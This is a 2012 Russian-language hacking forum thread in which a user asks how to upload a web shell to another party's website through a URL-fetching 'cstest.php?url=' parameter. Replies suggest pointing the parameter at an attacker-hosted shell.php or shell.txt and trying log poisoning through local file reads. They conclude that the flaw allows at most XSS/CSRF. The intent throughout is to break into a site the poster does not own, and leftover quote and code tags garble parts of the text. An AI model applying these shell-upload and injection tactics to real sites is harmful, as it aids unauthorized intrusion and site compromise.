PDA

Просмотр полной версии : Нужна помощь с заливкой shell'a


StormAttack
23.07.2012, 15:41
Есть сайт: https://site.com/cstest.php?url=

Eсли дописать ссылку https://site.com/cstest.php?url=http://site.ru/shell.php - то на сайте выводиться shell с моим сайтом.

Вопрос: можно ли залить Shell на сайт "https://site.com" ?

xxddz
23.07.2012, 15:50
Попробуй

https://site.com/cstest.php?url=http://site.ru/shell.txt

StormAttack
23.07.2012, 15:58
не прокатило...

вот что выбило:


posting to url: http://site.com/shell.txt
Array (

=> 200 [body] => [header] => HTTP/1.1 200 OK Date: Mon, 23 Jul 2012 10:50:33 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: close ETag: "3870-500d2bf7-0" Last-Modified: Mon, 23 Jul 2012 10:48:23 GMT Content-Type: text/plain Content-Length: 14448 )


[/QUOTE]
[/CODE]

[/QUOTE]

Chrome~
23.07.2012, 15:58
Попробуй
https://site.com/cstest.php?url=http://site.ru/shell.txt


Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.


не прокатило...
вот что выбило:


Хотя не iframe, скорее всего, а сайт просто пытается скачать и вывести страницу, которая передается в параметре url.

человек-паук
23.07.2012, 16:01
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом

StormAttack
23.07.2012, 16:02
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.


это не iframe, это форма с полями URL и FORM Body

StormAttack
23.07.2012, 16:06
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом


локальные файлы не читает


0Array (

=> 0 [body] => Couldn't resolve host 'whatwedo.php' )


[/QUOTE]
[/CODE]

[/QUOTE]

Chrome~
23.07.2012, 16:07
это не iframe, это форма с полями URL и FORM Body


Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.


локальные файлы не читает


Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.

StormAttack
23.07.2012, 16:11
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.


Понятно, спасибо.

totenkopf
02.08.2012, 10:07
0Array (

=> 0 [body] => Couldn't resolve host 'whatwedo.php' )

А чего он пытается его отрезолвить как хост?
Запрос покажи.


[/QUOTE]

А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/CODE]

[/QUOTE]